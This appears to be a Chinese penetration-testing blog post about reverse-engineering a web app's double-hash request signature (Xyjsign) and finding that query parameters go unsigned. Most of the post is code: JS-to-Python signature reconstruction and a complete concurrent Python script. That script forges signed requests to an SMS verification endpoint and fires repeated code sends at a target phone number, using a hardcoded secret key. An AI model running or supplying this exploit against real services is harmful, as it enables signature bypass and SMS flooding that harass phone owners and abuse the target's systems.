引言:

  • 背景介绍: 在一次常规的渗透测试中,遇到了一个防护极其严格的系统。所有的 API 请求都带有复杂的签名头(Xyjsign, Usign, Nonce, Timestamp),常规的重放攻击、参数篡改直接被返回 400 签名校验失败。

1. 静态侦察:

在抓包时,我注意到每一个发往后端的请求头中,都绑定着一个 Xyjsign 参数

我直接在全局代码中搜索了 "Xyjsign"

这是一个非常经典的“防重放 + 防篡改”的双层哈希体系。

  • 第一层 (变量 g): 将业务参数、用户名、时间戳、随机数全部拼接,然后使用 HMAC-SHA256 算法,配合一把名为 apiSecretKey 的密钥进行加密。

  • 第二层 (最终的 xyjsign): 为了防止哈希长度扩展攻击,同时增加逆向难度,开发者把第一层算出来的结果,再次和密钥、随机数混合,做了第二次纯 SHA256 运算。

虽然算法逻辑已经清晰,但我们面临着逆向工程中经典的‘木桶短板’:apiSecretKey。这把开启 HMAC 宝库的钥匙并未硬编码在本地,而是通过 Vuex 动态状态机从字典接口获取。

很多刚接触 API 逆向的新手可能会问:既然我已经知道了它用的是 SHA256,参数拼接顺序我也知道了,为什么我不能直接自己算一个签名发过去?

答案就在第一层加密使用的 HMAC (Hash-based Message Authentication Code) 算法上。

普通的 Hash 算法(如 MD5、SHA256)是公开透明的。如果前端仅仅是把参数拼起来 SHA256("phone=123&time=456"),那么黑客只要知道了拼接规则,任何人都可以伪造出合法的哈希值。

为了解决这个问题,HMAC 引入了“对称密钥 (Secret Key)”的概念。 在 HMAC 算法中,你不仅需要知道明文是什么,你还必须拥有一把只有客户端和服务端才知道的钥匙。如果你没有这把钥匙,哪怕你对算法了如指掌,算出来的哈希值也是完全错误的。

所以,想要接管这个 API,找到这把 apiSecretKey 就成了破局的唯一关键。

它是硬编码在前端代码里的吗? 并不是。仔细看源码中的这行提取逻辑: a.a.getters.getDictionaryByEnName("apiSecretKey")

这行代码透露了一个非常重要的架构信息:这个系统非常“聪明”,它没有把密钥写死在 JS 文件里,而是把它当成了系统“数据字典”的一部分,存放在了 Vuex(前端状态管理机)中。这意味着密钥是动态下发的。

既然是动态下发,那就必定会在网络流量中留下痕迹!思路瞬间打开:不需要去死磕前端内存调试,直接去 Burp Suite 的历史 HTTP 请求里搜!

2.提取签名算法核心 

通过接口调用堆栈定位加密逻辑

找到了addSign签名算法 打上断点 

  • 点击前端发送验证码功能,然后f11步入函数

  • 让我们仔细拆解一下这几行加密的核心代码:

  • var t = e.url.includes("/crud/page") || e.url.includes("/crud/saveList") || e.url.includes("/crud/delete");
    if (t) {
        // 如果是增删改查接口,走这边的逻辑...
    } else if (!t) {
        // 如果不是增删改查接口(我们的发短信接口正好走这个分支!)
        var r = "", a = i.a.getters.getDictionaryByEnName("apiSecretKey");
        null != a && a.value && (r = a.value); // 1. 从状态机拿到明文密钥
        
        var o = c.a.defaults.baseURL + e.url;  // 2. 拼接完整的请求 URL
        e.headers = s.a.addSigns(o, "", r);    // 3. 调用了 addSigns 函数!
    }

    这意味着什么?

    这意味着,在这个分支下,你发出的GET 请求里的 Query 参数,没有参与签名的哈希计算

  • 我们只需要抛弃掉所有的业务参数,在 Python 脚本中只传入接口的 URL 来生成 Xyjsign

  • 从 JS 源码到 Python 漏洞利用脚本(Exp)的转化

    发现了拦截器中调用 addSigns(URL) 的逻辑漏洞后,最后一步就是用 Python 编写一个能够自动生成合法签名的工具。

    为了让大家看懂这个脚本是怎么来的,我将 Python 代码与前端的 JavaScript 源码进行了一一映射的拆解:

    第一步:还原被“掉包”的加密载荷(Payload)

    在正常的逻辑中,应该拿业务参数(比如手机号)去签名。但根据我们溯源到的 addSigns 函数源码:

    JavaScript

    // 前端 addSigns 源码片段
    addSigns: function(e, n) { // 这里的 e 接收到的是拦截器传进来的完整的 URL
        var t = (new Date).getTime(),
            o = u(),
            // !!核心核爆点在这里!!
            s = { 
                method: e,    // URL 变成了 method 字段
                nonce: o,     // 随机数
                timestamp: t + "" // 时间戳
            }; 
        var d = i(s); // 将这个奇怪的对象交给 i() 函数去序列化
        // ... 后续计算哈希
    }
    

    这段 JS 代码直接决定了我们在 Python 中要怎么构造字典。这就对应了 Python 脚本中的:

    Python

    # 对应 JS 中的对象 s
    s_obj = {
        "method": url,          # 填入我们要请求的 API 路径
        "nonce": NONCE,         # 填入请求头中的 Nonce
        "timestamp": TIMESTAMP  # 填入请求头中的 Timestamp
    }
    
    第二步:复刻底层的 JSON 序列化规则 i(e)

    前面我们通过动态调试(或者剥离源码)发现,i(e) 的本质就是对字典的 Key 进行字母序排列,并转换为紧凑无空格的 JSON 字符串(即 JSON.stringify)。 在 Python 中,绝不能直接拼接字符串,必须使用 json.dumps 并指定特定参数来完美模拟:

    Python

    # 对应 JS 中的: var d = i(s);
    d = json.dumps(s_obj, sort_keys=True, separators=(',', ':'))
    # sort_keys=True 保证了按字母排序
    # separators=(',', ':') 保证了生成的字符串中没有任何多余的空格,与前端严格一致
    
    第三步:对齐双层哈希算法

    这是最核心的密码学翻译环节。前端使用了第三方库 A.a.HmacSHA256A.a.SHA256。在 Python 中,我们可以直接调用内置的 hmachashlib 库。

    第一层 HMAC-SHA256: 前端源码:A.a.HmacSHA256(d + n + t + o, f).toString() 这里 d 是序列化后的字符串,n 是用户名(这里是空),t 是时间戳,o 是随机数,f 是密钥 SecretKey。 Python 翻译:

    Python

    msg1 = f"{d}{USERNAME}{TIMESTAMP}{NONCE}".encode('utf-8')
    g = hmac.new(SECRET.encode('utf-8'), msg1, hashlib.sha256).hexdigest()
    

    第二层纯 SHA256: 前端源码:A.a.SHA256(l + f + "_" + o).toString() (注:l 即第一层算出的 g) Python 翻译:

    Python

    msg2 = f"{g}{SECRET}_{NONCE}".encode('utf-8')
    xyjsign = hashlib.sha256(msg2).hexdigest()
    
    第四步:为什么需要一个 possible_urls 的 Fuzzing 列表?

    在脚本的开头,我没有写死一个 URL,而是用了一个数组遍历:

    Python

    possible_urls = [
        "/api/front/sendRegisterSmsCode",
        "http://【目标ip】/api/front/sendRegisterSmsCode",
        # ...
    ]

    这是因为前端源码中有一句 var o = c.a.defaults.baseURL + e.url;。在没有动态断点看到 o 的绝对值时,我们无法确定前端打包时配置的 baseURL 到底带不带域名、带不带 http://

    因此,最聪明的做法是把几种常见的拼接情况全部列出来跑一遍,去“撞”抓包抓到的那个合法签名(TARGET)。只要有一个撞上了,就说明我们找准了前端最终拼接出的 URL 格式,以后所有的越权和 Fuzzing 都可以套用这个固定格式。

  • 附上python完整代码

  • import json
    import hmac
    import hashlib
    import time
    import uuid
    import requests
    from concurrent.futures import ThreadPoolExecutor, as_completed
    from urllib3.exceptions import InsecureRequestWarning

    # 禁用 SSL 警告
    requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

    class ConcurrentApiTester:
        def __init__(self, base_url, secret_key, max_workers=1):
            self.base_url = base_url.rstrip('/')
            self.secret_key = secret_key
            self.max_workers = max_workers
            self.session = requests.Session()
            self.session.trust_env = False 
            # 如果需要 Burp 观察并发效果,可取消注释
            # self.session.proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}

        def _generate_headers(self, path):
            """为每一次并发请求生成独立的凭证"""
            timestamp = str(int(time.time() * 1000))
            nonce = str(uuid.uuid4())
            s_obj = {"method": path, "nonce": nonce, "timestamp": timestamp}
            d = json.dumps(s_obj, sort_keys=True, separators=(',', ':'))
            
            # 第一层 HMAC-SHA256
            msg1 = f"{d}{''}{timestamp}{nonce}".encode('utf-8')
            g = hmac.new(self.secret_key.encode('utf-8'), msg1, hashlib.sha256).hexdigest()
            
            # 第二层 SHA256
            msg2 = f"{g}{self.secret_key}_{nonce}".encode('utf-8')
            xyjsign = hashlib.sha256(msg2).hexdigest()
            
            return {
                "Timestamp": timestamp,
                "Nonce": nonce,
                "Xyjsign": xyjsign,
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
                "Referer": f"{self.base_url}/"
            }

        def single_request(self, path, phone, task_id):
            """单个请求任务"""
            headers = self._generate_headers(path)
            full_url = f"{self.base_url}{path}?phone={phone}&randomTime={headers['Timestamp']}"
            
            try:
                start_time = time.time()
                response = self.session.get(full_url, headers=headers, verify=False, timeout=5)
                elapsed = time.time() - start_time
                
                result = response.json()
                status = "SUCCESS" if (result.get("code") == 200 or result.get("success")) else "FAILED"
                return task_id, status, result.get("msg"), elapsed
            except Exception as e:
                return task_id, "ERROR", str(e), 0

        def run_concurrent_test(self, path, phone, total_requests):
            """启动并发测试"""
            print(f"[*] 启动并发测试: 线程数={self.max_workers}, 总请求={total_requests}")
            print(f"[*] 目标手机: {phone}\n" + "-"*50)

            results = {"SUCCESS": 0, "FAILED": 0, "ERROR": 0}
            start_wall_time = time.time()

            with ThreadPoolExecutor(max_workers=self.max_workers) as executor:
                # 提交任务队列
                futures = [executor.submit(self.single_request, path, phone, i) for i in range(total_requests)]
                
                for future in as_completed(futures):
                    tid, status, msg, elapsed = future.result()
                    results[status] += 1
                    print(f"[Task {tid:03d}] 状态: {status:7s} | 耗时: {elapsed:.2f}s | 返回: {msg}")

            end_wall_time = time.time()
            print("-"*50)
            print(f"[*] 测试完成!总耗时: {end_wall_time - start_wall_time:.2f}s")
            print(f"[*] 统计结果: {results}")

    if __name__ == "__main__":
        CONFIG = {
            "HOST": "",
            "PROTOCOL": "https",
            "KEY": "bzsqikmbcgwrrntuhbod",
            "API": "/api/front/sendRegisterSmsCode"
        }
        
        # 想要测试的号码
        TARGET_PHONE = ""
        
        # 并发参数优化:
        # max_workers: 线程数(并发压力度)
        # total_requests: 总共发送多少个包(测试持续度)
        tester = ConcurrentApiTester(f"{CONFIG['PROTOCOL']}://{CONFIG['HOST']}", CONFIG['KEY'], max_workers=5)
        tester.run_concurrent_test(CONFIG['API'], TARGET_PHONE, total_requests=20)

更多推荐